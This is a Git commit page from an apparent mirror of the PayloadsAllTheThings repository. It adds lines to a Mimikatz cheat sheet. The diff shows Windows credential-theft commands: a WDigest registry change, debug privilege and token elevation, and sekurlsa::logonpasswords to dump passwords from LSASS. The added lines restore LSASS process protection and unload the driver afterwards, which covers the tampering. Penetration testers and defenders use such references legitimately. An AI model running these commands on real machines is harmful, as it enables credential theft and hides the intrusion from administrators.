ch0ic3/PayloadsAllTheThings
1
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2025-02-22 14:43:45 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity

Merge pull request #338 from mpgn/patch-1

Browse Source 
Add mimikatz command to protect a process after removing the protection
This commit is contained in:
Swissky 2021-02-17 12:32:23 +01:00 committed by GitHub
commit e128964dd9
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 7 additions and 1 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

6
Methodology and Resources/Windows - Mimikatz.md
View File

@ -77,6 +77,12 @@ reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLo
mimikatz # privilege::debug mimikatz # privilege::debug
mimikatz # token::elevate mimikatz # token::elevate
mimikatz # sekurlsa::logonpasswords mimikatz # sekurlsa::logonpasswords
# Now lets re-add the protection flags to the lsass.exe process
mimikatz # !processprotect /process:lsass.exe
# Unload the service created
mimikatz # !-
``` ```
- LSA is running as virtualized process (LSAISO) by **Credential Guard** - LSA is running as virtualized process (LSAISO) by **Credential Guard**